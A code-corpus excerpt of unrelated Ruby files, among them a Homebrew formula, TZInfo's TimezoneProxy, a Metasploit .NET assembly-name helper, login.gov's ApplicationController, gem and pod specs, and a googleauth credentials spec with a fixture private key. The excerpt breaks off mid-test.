livecheck do
url :stable
end
bottle do
cellar :any_skip_relocation
sha256 "231b635ddf8a704a3be4a6ba34611248ece69ed1de04fb82adfa6a20ac83fddb" => :catalina
sha256 "29ec2f9cf132be84c577ff6d6ea02845ee96d995e1affdea8961903f9fec616a" => :mojave
sha256 "e4d363c9d5035fc814ca6a6820b9c8c35a320cd507067cad5eb0c0e6c337c36e" => :high_sierra
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
system "npm", "init", "-y"
system "npm", "install", *Language::Node.local_npm_install_args, "gulp"
output = shell_output("#{bin}/gulp --version")
assert_match "CLI version: #{version}", output
assert_match "Local version: ", output
(testpath/"gulpfile.js").write <<~EOS
function defaultTask(cb) {
cb();
}
exports.default = defaultTask
EOS
assert_match "Finished 'default' after ", shell_output("#{bin}/gulp")
end
end
| 29.133333 | 93 | 0.715484 |
2124849dc5c18f9493bbeeca935a51674af59b43 | 3,217 | module TZInfo
# A proxy class standing in for a {Timezone} with a given identifier.
# {TimezoneProxy} inherits from {Timezone} and can be treated identically to
# {Timezone} instances loaded with {Timezone.get}.
#
# {TimezoneProxy} instances are used to avoid the performance overhead of
# loading time zone data into memory, for example, by {Timezone.all}.
#
# The first time an attempt is made to access the data for the time zone, the
# real {Timezone} will be loaded is loaded. If the proxy's identifier was not
# valid, then an exception will be raised at this point.
class TimezoneProxy < Timezone
# Initializes a new {TimezoneProxy}.
#
# The `identifier` parameter is not checked when initializing the proxy. It
# will be validated when the real {Timezone} instance is loaded.
#
# @param identifier [String] an IANA Time Zone Database time zone
# identifier.
def initialize(identifier)
super()
@identifier = identifier
@real_timezone = nil
end
# (see Timezone#identifier)
def identifier
@real_timezone ? @real_timezone.identifier : @identifier
end
# (see Timezone#period_for)
def period_for(time)
real_timezone.period_for_utc(time)
end
# (see Timezone#periods_for_local)
def periods_for_local(local_time)
real_timezone.periods_for_local(local_time)
end
# (see Timezone#transitions_up_to)
def transitions_up_to(to, from = nil)
real_timezone.transitions_up_to(to, from)
end
# (see Timezone#canonical_zone)
def canonical_zone
real_timezone.canonical_zone
end
# Returns a serialized representation of this {TimezoneProxy}. This method
# is called when using `Marshal.dump` with an instance of {TimezoneProxy}.
#
# @param limit [Integer] the maximum depth to dump - ignored. @return
# [String] a serialized representation of this {TimezoneProxy}.
# @return [String] a serialized representation of this {TimezoneProxy}.
def _dump(limit)
identifier
end
# Loads a {TimezoneProxy} from the serialized representation returned by
# {_dump}. This is method is called when using `Marshal.load` or
# `Marshal.restore` to restore a serialized {Timezone}.
#
# @param data [String] a serialized representation of a {TimezoneProxy}.
# @return [TimezoneProxy] the result of converting `data` back into a
# {TimezoneProxy}.
def self._load(data)
TimezoneProxy.new(data)
end
private
# Returns the real {Timezone} instance being proxied.
#
# The real {Timezone} is loaded using {Timezone.get} on the first access.
#
# @return [Timezone] the real {Timezone} instance being proxied.
def real_timezone
# Thread-safety: It is possible that the value of @real_timezone may be
# calculated multiple times in concurrently executing threads. It is not
# worth the overhead of locking to ensure that @real_timezone is only
# calculated once.
unless @real_timezone
result = Timezone.get(@identifier)
return result if frozen?
@real_timezone = result
end
@real_timezone
end
end
end
| 33.863158 | 79 | 0.692882 |
1d0d203b51dd48a53ea35bc783e74db29dc1bab5 | 1,306 | module Msf
module Util
module DotNetDeserialization
module Assemblies
# see:
# * https://docs.microsoft.com/en-us/dotnet/standard/assembly/
# * https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/versions-and-dependencies
# * https://docs.microsoft.com/en-us/dotnet/standard/assembly/reference-strong-named
class StrongName
def initialize(name, version, public_key_token, culture: 'neutral')
@name = name
@version = version
@public_key_token = public_key_token
@culture = culture
end
attr_reader :name, :version, :public_key_token, :culture
def to_s
"#{name}, Version=#{version}, Culture=#{culture}, PublicKeyToken=#{public_key_token}"
end
def [](type_name)
QualifiedName.new(type_name, self)
end
end
# see: https://docs.microsoft.com/en-us/dotnet/api/system.type.assemblyqualifiedname
class QualifiedName
def initialize(name, assembly)
@name = name
@assembly = assembly
end
attr_reader :name, :assembly
def to_s
"#{name}, #{assembly}"
end
end
VERSIONS = {
'4.0.0.0' => {
'mscorlib' => StrongName.new('mscorlib', '4.0.0.0', 'b77a5c561934e089'),
'System' => StrongName.new('System', '4.0.0.0', 'b77a5c561934e089')
}
}
end
end
end
end
| 24.185185 | 99 | 0.661562 |
7a6f020ca23b2e60be39fe3ca6a9e8753755823d | 11,792 | require 'core_extensions/string/permit'
class ApplicationController < ActionController::Base
String.include CoreExtensions::String::Permit
include VerifyProfileConcern
include LocaleHelper
include VerifySpAttributesConcern
include EffectiveUser
FLASH_KEYS = %w[error info success warning other].freeze
FLASH_KEY_MAP = { 'notice' => 'info', 'alert' => 'error' }.freeze
# Prevent CSRF attacks by raising an exception.
# For APIs, you may want to use :null_session instead.
protect_from_forgery with: :exception
rescue_from ActionController::InvalidAuthenticityToken, with: :invalid_auth_token
rescue_from ActionController::UnknownFormat, with: :render_not_found
[
ActiveRecord::ConnectionTimeoutError,
PG::ConnectionBad, # raised when a Postgres connection times out
Rack::Timeout::RequestTimeoutException,
Redis::BaseConnectionError,
].each do |error|
rescue_from error, with: :render_timeout
end
helper_method :decorated_session, :reauthn?, :user_fully_authenticated?
prepend_before_action :add_new_relic_trace_attributes
prepend_before_action :session_expires_at
prepend_before_action :set_locale
before_action :disable_caching
before_action :cache_issuer_in_cookie
def session_expires_at
now = Time.zone.now
session[:session_expires_at] = now + Devise.timeout_in
session[:pinged_at] ||= now
redirect_on_timeout
end
# for lograge
def append_info_to_payload(payload)
payload[:user_id] = analytics_user.uuid unless @skip_session_load
end
attr_writer :analytics
def analytics
@analytics ||=
Analytics.new(user: analytics_user, request: request, sp: current_sp&.issuer, ahoy: ahoy)
end
def analytics_user
effective_user || AnonymousUser.new
end
def user_event_creator
@user_event_creator ||= UserEventCreator.new(request: request, current_user: current_user)
end
delegate :create_user_event, :create_user_event_with_disavowal, to: :user_event_creator
delegate :remember_device_default, to: :decorated_session
def decorated_session
@_decorated_session ||= DecoratedSession.new(
sp: current_sp,
view_context: view_context,
sp_session: sp_session,
service_provider_request: service_provider_request,
).call
end
def default_url_options
{ locale: locale_url_param, host: IdentityConfig.store.domain_name }
end
def sign_out(*args)
request.cookie_jar.delete('ahoy_visit')
super
end
def context
user_session[:context] || UserSessionContext::DEFAULT_CONTEXT
end
private
# These attributes show up in New Relic traces for all requests.
# https://docs.newrelic.com/docs/agents/manage-apm-agents/agent-data/collect-custom-attributes
def add_new_relic_trace_attributes
::NewRelic::Agent.add_custom_attributes(amzn_trace_id: amzn_trace_id)
end
def amzn_trace_id
request.headers['X-Amzn-Trace-Id']
end
def disable_caching
response.headers['Cache-Control'] = 'no-store'
response.headers['Pragma'] = 'no-cache'
end
def cache_issuer_in_cookie
cookies[:sp_issuer] = if current_sp.nil?
nil
else
{
value: current_sp.issuer,
expires: IdentityConfig.store.session_timeout_in_minutes.minutes,
}
end
end
def redirect_on_timeout
return unless params[:timeout]
unless current_user
flash[:info] = t(
'notices.session_cleared',
minutes: IdentityConfig.store.session_timeout_in_minutes,
)
end
begin
redirect_to url_for(permitted_timeout_params)
rescue ActionController::UrlGenerationError # binary data in params cause redirect to throw this
head :bad_request
end
end
def permitted_timeout_params
params.permit(:request_id)
end
def current_sp
@current_sp ||= sp_from_sp_session || sp_from_request_id || sp_from_request_issuer_logout
end
def sp_from_sp_session
sp = ServiceProvider.from_issuer(sp_session[:issuer])
sp if sp.is_a? ServiceProvider
end
def sp_from_request_id
sp = ServiceProvider.from_issuer(service_provider_request.issuer)
sp if sp.is_a? ServiceProvider
end
def sp_from_request_issuer_logout
return if action_name != 'logout'
issuer_sp = ServiceProvider.from_issuer(saml_request&.service_provider&.identifier)
issuer_sp if issuer_sp.is_a? ServiceProvider
end
def service_provider_request
@service_provider_request ||= ServiceProviderRequestProxy.from_uuid(params[:request_id])
end
def add_piv_cac_setup_url
session[:needs_to_setup_piv_cac_after_sign_in] ? login_add_piv_cac_prompt_url : nil
end
def service_provider_mfa_setup_url
service_provider_mfa_policy.user_needs_sp_auth_method_setup? ? two_factor_options_url : nil
end
def after_sign_in_path_for(_user)
service_provider_mfa_setup_url || add_piv_cac_setup_url ||
user_session.delete(:stored_location) || sp_session_request_url_without_prompt_login ||
signed_in_url
end
def signed_in_url
user_fully_authenticated? ? account_or_verify_profile_url : user_two_factor_authentication_url
end
def after_mfa_setup_path
if needs_completions_screen?
sign_up_completed_url
elsif user_needs_to_reactivate_account?
reactivate_account_url
else
session[:account_redirect_path] || after_sign_in_path_for(current_user)
end
end
def user_needs_to_reactivate_account?
return false if current_user.decorate.password_reset_profile.blank?
sp_session[:ial2] == true
end
def reauthn_param
params[:reauthn]
end
def invalid_auth_token(_exception)
controller_info = "#{controller_path}##{action_name}"
analytics.track_event(
Analytics::INVALID_AUTHENTICITY_TOKEN,
controller: controller_info,
user_signed_in: user_signed_in?,
)
flash[:error] = t('errors.invalid_authenticity_token')
redirect_back fallback_location: new_user_session_url
end
def user_fully_authenticated?
!reauthn? && user_signed_in? &&
two_factor_enabled? &&
session['warden.user.user.session'] &&
!session['warden.user.user.session'].try(
:[],
TwoFactorAuthenticatable::NEED_AUTHENTICATION,
)
end
def reauthn?
reauthn = reauthn_param
reauthn.present? && reauthn == 'true'
end
def confirm_two_factor_authenticated(id = nil)
return prompt_to_sign_in_with_request_id(id) if user_needs_new_session_with_request_id?(id)
authenticate_user!(force: true)
return prompt_to_setup_mfa unless two_factor_enabled?
return prompt_to_verify_mfa unless user_fully_authenticated?
return prompt_to_setup_mfa if service_provider_mfa_policy.
user_needs_sp_auth_method_setup?
return prompt_to_verify_sp_required_mfa if service_provider_mfa_policy.
user_needs_sp_auth_method_verification?
enforce_total_session_duration_timeout
true
end
def enforce_total_session_duration_timeout
return sign_out_with_timeout_error if session_total_duration_expired?
ensure_user_session_has_created_at
end
def sign_out_with_timeout_error
analytics.track_event(Analytics::SESSION_TOTAL_DURATION_TIMEOUT)
sign_out
flash[:info] = t('devise.failure.timeout')
redirect_to root_url
end
def ensure_user_session_has_created_at
return if user_session.nil? || user_session[:created_at].present?
user_session[:created_at] = Time.zone.now
end
def session_total_duration_expired?
session_created_at = user_session&.dig(:created_at)
return if session_created_at.blank?
session_created_at = Time.zone.parse(session_created_at.to_s)
timeout_in_minutes = IdentityConfig.store.session_total_duration_timeout_in_minutes.minutes
(session_created_at + timeout_in_minutes) < Time.zone.now
end
def prompt_to_sign_in_with_request_id(request_id)
redirect_to new_user_session_url(request_id: request_id)
end
def prompt_to_setup_mfa
redirect_to two_factor_options_url
end
def prompt_to_verify_mfa
redirect_to user_two_factor_authentication_url
end
def prompt_to_verify_sp_required_mfa
redirect_to sp_required_mfa_verification_url
end
def sp_required_mfa_verification_url
return login_two_factor_piv_cac_url if service_provider_mfa_policy.piv_cac_required?
if TwoFactorAuthentication::PivCacPolicy.new(current_user).enabled? && !mobile?
login_two_factor_piv_cac_url
elsif TwoFactorAuthentication::WebauthnPolicy.new(current_user).enabled?
login_two_factor_webauthn_url
else
login_two_factor_piv_cac_url
end
end
def user_needs_new_session_with_request_id?(id)
!user_signed_in? && id.present?
end
def two_factor_enabled?
MfaPolicy.new(current_user).two_factor_enabled?
end
def skip_session_expiration
@skip_session_expiration = true
end
def skip_session_load
@skip_session_load = true
end
def set_locale
I18n.locale = LocaleChooser.new(params[:locale], request).locale
end
def sp_session_ial
sp_session[:ial].presence || 1
end
def increment_monthly_auth_count
return unless current_user&.id
issuer = sp_session[:issuer]
return if issuer.blank? || !first_auth_of_session?(issuer, sp_session_ial)
MonthlySpAuthCount.increment(current_user.id, issuer, sp_session_ial)
end
def first_auth_of_session?(issuer, ial)
auth_sp_token = "auth_counted_#{issuer}"
auth_sp_token.concat('ial1') if ial == 1
authenticated_to_sp = user_session[auth_sp_token]
return if authenticated_to_sp
user_session[auth_sp_token] = true
end
def mfa_policy
@mfa_policy ||= MfaPolicy.new(current_user)
end
def service_provider_mfa_policy
@service_provider_mfa_policy ||= ServiceProviderMfaPolicy.new(
user: current_user,
service_provider: sp_from_sp_session,
auth_method: user_session[:auth_method],
aal_level_requested: sp_session[:aal_level_requested],
piv_cac_requested: sp_session[:piv_cac_requested],
)
end
def sp_session
session.fetch(:sp, {})
end
def sp_session_request_url_without_prompt_login
# login.gov redirects to the orginal request_url after a user authenticates
# replace prompt=login with prompt=select_account to prevent sign_out
# which should only every occur once when the user lands on login.gov with prompt=login
url = sp_session[:request_url]
url ? url.gsub('prompt=login', 'prompt=select_account') : nil
end
def render_not_found
render template: 'pages/page_not_found', layout: false, status: :not_found, formats: :html
end
def render_timeout(exception)
analytics.track_event(Analytics::RESPONSE_TIMED_OUT, analytics_exception_info(exception))
if exception.class == Rack::Timeout::RequestTimeoutException
NewRelic::Agent.notice_error(exception)
end
render template: 'pages/page_took_too_long',
layout: false, status: :service_unavailable, formats: :html
end
def render_full_width(template, **opts)
render template, **opts, layout: 'base'
end
def analytics_exception_info(exception)
{
backtrace: Rails.backtrace_cleaner.send(:filter, exception.backtrace),
exception_message: exception.to_s,
exception_class: exception.class.name,
}
end
def add_sp_cost(token)
Db::SpCost::AddSpCost.call(
sp_session[:issuer].to_s,
sp_session_ial,
token,
transaction_id: nil,
user_id: current_user.id,
)
end
def mobile?
client = DeviceDetector.new(request.user_agent)
client.device_type != 'desktop'
end
end
| 30.005089 | 100 | 0.745166 |
018e5e1d74fff8e9192b79e821b0409e159951c5 | 1,171 | # -*- encoding: utf-8 -*-
$:.push File.expand_path('../lib', __FILE__)
require 'redis-rails/version'
Gem::Specification.new do |s|
s.name = 'redis-rails'
s.version = Redis::Rails::VERSION
s.authors = ['Luca Guidi', 'Ryan Bigg']
s.email = ['[email protected]', '[email protected]']
s.homepage = 'http://redis-store.org/redis-rails'
s.summary = %q{Redis for Ruby on Rails}
s.description = %q{Redis for Ruby on Rails}
s.license = 'MIT'
s.rubyforge_project = 'redis-rails'
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
s.require_paths = ['lib']
s.add_dependency 'redis-store', '~> 1.1.0'
s.add_dependency 'redis-activesupport', '~> 4'
s.add_dependency 'redis-actionpack', '~> 4'
s.add_development_dependency 'rake', '~> 10'
s.add_development_dependency 'bundler', '~> 1.3'
s.add_development_dependency 'mocha', '~> 0.14.0'
s.add_development_dependency 'minitest', '~> 4.2'
s.add_development_dependency 'redis-store-testing'
end
| 36.59375 | 83 | 0.625961 |
87f71222d832197e0b4e5515f0858a81b702e777 | 1,029 | class ConsolidatedBagpipesMigration < ActiveRecord::Migration
def self.up
create_table :members do |t|
t.string :name
t.boolean :administrator, :default => false
t.datetime :created_at
t.datetime :updated_at
t.integer :user_id, :null => false
t.string :user_type, :null => false
end
create_table :messages do |t|
t.integer :topic_id
t.integer :parent_id
t.string :title
t.text :content
t.datetime :created_at
t.datetime :updated_at
t.integer :member_id
end
add_index :messages, [:topic_id], :name => :index_messages_on_topic_id
add_index :messages, [:parent_id], :name => :index_messages_on_parent_id
create_table :topics do |t|
t.string :title
t.text :description
t.datetime :created_at
t.datetime :updated_at
end
end
def self.down
drop_table :messages
drop_table :members
drop_table :topics
end
end | 27.078947 | 76 | 0.613217 |
010e2810f19facaa378c1c95f59a39d65b5dbe70 | 123 | RSpec.describe Msf::Exploit::SQLi::MySQLi::TimeBasedBlind do
it_should_behave_like 'TimeBasedBlind', described_class
end
| 30.75 | 60 | 0.829268 |
b9e1df9a31a461806b51256ebcb425d37517dc0f | 4,094 | require 'spec_helper'
require 'trice_controller_method_test_controller'
describe 'TriceControllerMethodTestController E2E', type: :request do
scenario 'hi' do
get '/bang'
expect(response.status).to eq 400
end
end
if defined?(ActionController::API)
describe 'TriceApiControllerMethodTestController E2E', type: :request do
scenario 'hi' do
get '/api/bang'
expect(response.status).to eq 400
end
end
end
shared_examples 'trice controller methods' do
describe '#requested_at should be same time' do
before do
get :hi
end
specify { expect(assigns(:requested_at_x)).to be_acts_like(:time) }
specify { expect(assigns(:requested_at_x)).to be assigns(:requested_at_y) }
end
describe 'request stubbing' do
let(:time) { Time.zone.parse('2016-02-01 00:00:00') }
context 'stubbed by query' do
before do
if Rails.gem_version >= Gem::Version.new('5.0.0')
get :hi, params: { '_requested_at' => time.strftime('%Y%m%d%H%M%S') }
else
get :hi, '_requested_at' => time.strftime('%Y%m%d%H%M%S')
end
end
specify { expect(assigns(:requested_at_x)).to eq time }
end
context 'stubbed by header' do
before do
request.headers['X-Requested-At'] = time.iso8601
get :hi
end
specify { expect(assigns(:requested_at_x)).to eq time }
end
context 'StubConfiguration#stubbable? is not evaluated without stubbed by param or header' do
before do
expect_any_instance_of(Trice::ControllerMethods::StubConfiguration).not_to receive(:stubbable?)
get :hi
end
specify { expect(assigns(:requested_at_x)).to be_acts_like(:time) }
end
context 'stubbed by helper method (static)' do
t = Time.now
stub_requested_at t
before do
get :hi
end
specify { expect(assigns(:requested_at_x)).to eq Time.at(t.to_i).utc }
end
context 'stubbed by helper method (block)' do
let(:time) { Time.zone.parse('2016-02-01 00:00:00') }
stub_requested_at { time }
before do
get :hi
end
specify { expect(assigns(:requested_at_x)).to eq time }
end
context 'stubbed by both' do
let(:time) { Time.zone.parse('2016-02-01 00:00:00') }
before do
request.headers['X-Requested-At'] = 1.day.ago(time).iso8601
if Rails.gem_version >= Gem::Version.new('5.0.0')
get :hi, params: { '_requested_at' => time.strftime('%Y%m%d%H%M%S') }
else
get :hi, '_requested_at' => time.strftime('%Y%m%d%H%M%S')
end
end
specify 'prefers query params' do
expect(assigns(:requested_at_x)).to eq time
end
end
end
end
describe TriceControllerMethodTestController, type: :controller do
it_behaves_like 'trice controller methods'
end
if defined?(ActionController::API)
describe TriceApiControllerMethodTestController, type: :controller do
it_behaves_like 'trice controller methods'
end
end
describe 'stub_requested_at helper for feature spec', type: :feature do
let(:time) { Time.zone.parse('2016-02-01 00:00:00') }
stub_requested_at { time }
def with_driver(driver, &block)
saved = Capybara.current_driver
Capybara.current_driver = driver
block.call
ensure
Capybara.current_driver = saved
end
context 'with rack_test driver' do
around do |example|
with_driver(:rack_test) do
example.run
end
end
scenario do
visit '/hi'
expect(Time.zone.parse(JSON.parse(page.body)['requested_at_x'])).to eq(time)
end
end
context 'with poltergeist driver' do
around do |example|
with_driver(:poltergeist) do
example.run
end
end
scenario do
visit '/hi'
# XXX: poltergeist returns `<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{"requested_at_x":"2016-02-01T00:00:00.000Z","requested_at_y":"2016-02-01T00:00:00.000Z"}</pre></body></html>`
expect(page.body).to include(time.to_json)
end
end
end
| 26.24359 | 228 | 0.65022 |
ffcf9b72701237b0b682741d3bf6586fa95a60bb | 76 | class Photo < ActiveRecord::Base
mount_uploader :image, ImageUploader
end
| 19 | 38 | 0.802632 |
4a0ed2da210a0e2a2eb159784de32a0901cba088 | 1,173 | Pod::Spec.new do |s|
s.name = "Horadric"
s.version = "0.0.5"
s.summary = "Combine your development skills to build something great"
s.description = <<-DESC
A longer description of Horadric in Markdown format.
* Think: Why did you write this? What is the focus? What does it do?
* CocoaPods will be using this to generate tags, and improve search results.
* Try to keep it short, snappy and to the point.
* Finally, don't worry about the indent, CocoaPods strips it!
DESC
s.homepage = "http://www.prismatik.com.au"
s.license = { type: "MIT", file: "LICENSE" }
s.author = { "Jack Dean Watson-Hamblin" => "[email protected]" }
s.social_media_url = "http://twitter.com/FluffyJack"
s.platform = :ios
s.platform = :ios, "8.0"
s.source = { :git => "https://github.com/FluffyJack/Horadric.git", :tag => s.version }
s.source_files = "Horadric/**/*.{swift}"
s.exclude_files = "Horadric/Exclude", "Horadric/HoradricTests"
s.framework = "WebKit"
s.requires_arc = true
end
| 35.545455 | 95 | 0.584825 |
bf85c6ddebb4d820a2a06af4ef48717d7f5e3051 | 744 | cask "canva" do
version "1.14.0"
sha256 "04595dce762c2613efc28fdc0f8a15ca78149e912ceef4724f6eadec697a530b"
url "https://desktop-release.canva-deploy.com/Canva-#{version}.dmg",
verified: "desktop-release.canva-deploy.com/"
appcast "https://desktop-release.canva-deploy.com/latest-mac.yml"
name "Canva"
desc "Design tool"
homepage "https://www.canva.com/"
auto_updates true
app "Canva.app"
zap trash: [
"~/Library/Application Support/Canva",
"~/Library/Caches/com.canva.CanvaDesktop",
"~/Library/Caches/com.canva.CanvaDesktop.ShipIt",
"~/Library/Logs/Canva",
"~/Library/Preferences/com.canva.CanvaDesktop.plist",
"~/Library/Saved Application State/com.canva.CanvaDesktop.savedState",
]
end
| 29.76 | 75 | 0.719086 |
1d512e5492090036dac21b3dec0099bfdfe17ab3 | 332 | module Ipaymu
class SignatureService
attr_reader :key
def initialize(key, digest=Ipaymu::SHA256Digest)
@key = key
@digest = digest
end
def sign(data)
str_to_sign = DataSign.signature(data)
hash(str_to_sign)
end
def hash(data)
@digest.hexdigest(@key, data)
end
end
end | 17.473684 | 52 | 0.635542 |
abed8216f45e056e2cc712b8de6132833402566f | 1,251 | module Rules
##
# Tests that all GitHub email addresses match the
# {GithubConnector::Settings#rule_email_regex} setting. If
# no `rule_email_regex` setting exists, this rule always
# returns `true`.
class Email < Base
# Returns true if this rule is enabled.
#
# @return [Boolean]
def self.enabled?
!!settings.rule_email_regex
end
# A descriptive error message to display when this rule
# fails.
#
# @return [String]
def error_msg
return nil if result
bad_emails = email_addresses.reject { |email| regex.match(email) }
"#{bad_emails.count == 1 ? 'Email does' : 'Emails do'} not meet criteria: #{bad_emails.join(', ')}"
end
# This rule is required for external users.
#
# @return [Boolean] false
def required_for_external?
false
end
# The result of applying this rule to the {GithubUser}.
# @return [Boolean] `true` if the rule passes, false otherwise
def result
email_addresses.all? { |email| regex.match(email) }
end
private
def email_addresses
github_user.emails.map { |email| email.address.downcase }
end
def regex
@regex ||= Regexp.new(settings.rule_email_regex)
end
end
end
| 24.057692 | 105 | 0.647482 |
91e1e924f1661314007a7b397b46818e0ad7a0e2 | 224 | require 'rails_helper'
RSpec.describe Steps::Abduction::RiskDetailsController, type: :controller do
it_behaves_like 'an intermediate step controller', Steps::Abduction::RiskDetailsForm, C100App::AbductionDecisionTree
end
| 37.333333 | 118 | 0.830357 |
ff50f4210d6d6be3439710ca581887133d7c0860 | 28,889 | # Copyright 2015 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "googleauth"
# This test is testing the private class Google::Auth::Credentials. We want to
# make sure that the passed in scope propogates to the Signet object. This means
# testing the private API, which is generally frowned on.
describe Google::Auth::Credentials, :private do
let(:token) { "1/abcdef1234567890" }
let :default_keyfile_hash do
{
"private_key_id" => "testabc1234567890xyz",
"private_key" => "-----BEGIN RSA PRIVATE KEY-----\nMIIBOwIBAAJBAOyi0Hy1l4Ym2m2o71Q0TF4O9E81isZEsX0bb+Bqz1SXEaSxLiXM\nUZE8wu0eEXivXuZg6QVCW/5l+f2+9UPrdNUCAwEAAQJAJkqubA/Chj3RSL92guy3\nktzeodarLyw8gF8pOmpuRGSiEo/OLTeRUMKKD1/kX4f9sxf3qDhB4e7dulXR1co/\nIQIhAPx8kMW4XTTL6lJYd2K5GrH8uBMp8qL5ya3/XHrBgw3dAiEA7+3Iw3ULTn2I\n1J34WlJ2D5fbzMzB4FAHUNEV7Ys3f1kCIQDtUahCMChrl7+H5t9QS+xrn77lRGhs\nB50pjvy95WXpgQIhAI2joW6JzTfz8fAapb+kiJ/h9Vcs1ZN3iyoRlNFb61JZAiA8\nNy5NyNrMVwtB/lfJf1dAK/p/Bwd8LZLtgM6PapRfgw==\n-----END RSA PRIVATE KEY-----\n",
"client_email" => "[email protected]",
"client_id" => "credz-testabc1234567890xyz.apps.googleusercontent.com",
"type" => "service_account",
"project_id" => "a_project_id",
"quota_project_id" => "b_project_id"
}
end
def mock_signet
mocked_signet = double "Signet::OAuth2::Client"
allow(mocked_signet).to receive(:configure_connection).and_return(mocked_signet)
allow(mocked_signet).to receive(:needs_access_token?).and_return(true)
allow(mocked_signet).to receive(:fetch_access_token!).and_return(true)
allow(mocked_signet).to receive(:client_id)
allow(Signet::OAuth2::Client).to receive(:new) do |options|
yield options if block_given?
mocked_signet
end
mocked_signet
end
it "uses a default scope" do
mock_signet do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq([])
expect(options[:issuer]).to eq(default_keyfile_hash["client_email"])
expect(options[:signing_key]).to be_a_kind_of(OpenSSL::PKey::RSA)
end
Google::Auth::Credentials.new default_keyfile_hash
end
it "uses a custom scope" do
mock_signet do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:issuer]).to eq(default_keyfile_hash["client_email"])
expect(options[:signing_key]).to be_a_kind_of(OpenSSL::PKey::RSA)
end
Google::Auth::Credentials.new default_keyfile_hash, scope: "http://example.com/scope"
end
it "uses empty paths and env_vars by default" do
expect(Google::Auth::Credentials.paths).to eq([])
expect(Google::Auth::Credentials.env_vars).to eq([])
end
describe "using CONSTANTS" do
it "can be subclassed to pass in other env paths" do
test_path_env_val = "/unknown/path/to/file.txt".freeze
test_json_env_val = JSON.generate default_keyfile_hash
ENV["TEST_PATH"] = test_path_env_val
ENV["TEST_JSON_VARS"] = test_json_env_val
class TestCredentials1 < Google::Auth::Credentials
TOKEN_CREDENTIAL_URI = "https://example.com/token".freeze
AUDIENCE = "https://example.com/audience".freeze
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["TEST_PATH"].freeze
JSON_ENV_VARS = ["TEST_JSON_VARS"].freeze
end
allow(::File).to receive(:file?).with(test_path_env_val) { false }
allow(::File).to receive(:file?).with(test_json_env_val) { false }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://example.com/token")
expect(options[:audience]).to eq("https://example.com/audience")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to eq(true)
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(test_json_env_val)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials1.default enable_self_signed_jwt: true
expect(creds).to be_a_kind_of(TestCredentials1)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use PATH_ENV_VARS to get keyfile path" do
class TestCredentials2 < Google::Auth::Credentials
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = %w[PATH_ENV_DUMMY PATH_ENV_TEST].freeze
JSON_ENV_VARS = ["JSON_ENV_DUMMY"].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"].freeze
end
json_content = JSON.generate default_keyfile_hash
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("PATH_ENV_TEST") { "/unknown/path/to/file.txt" }
allow(::File).to receive(:file?).with("/unknown/path/to/file.txt") { true }
allow(::File).to receive(:read).with("/unknown/path/to/file.txt") { json_content }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(json_content)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials2.default
expect(creds).to be_a_kind_of(TestCredentials2)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use JSON_ENV_VARS to get keyfile contents" do
test_json_env_val = JSON.generate default_keyfile_hash
class TestCredentials3 < Google::Auth::Credentials
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["PATH_ENV_DUMMY"].freeze
JSON_ENV_VARS = %w[JSON_ENV_DUMMY JSON_ENV_TEST].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"].freeze
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::File).to receive(:file?).with(test_json_env_val) { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::ENV).to receive(:[]).with("JSON_ENV_TEST") { test_json_env_val }
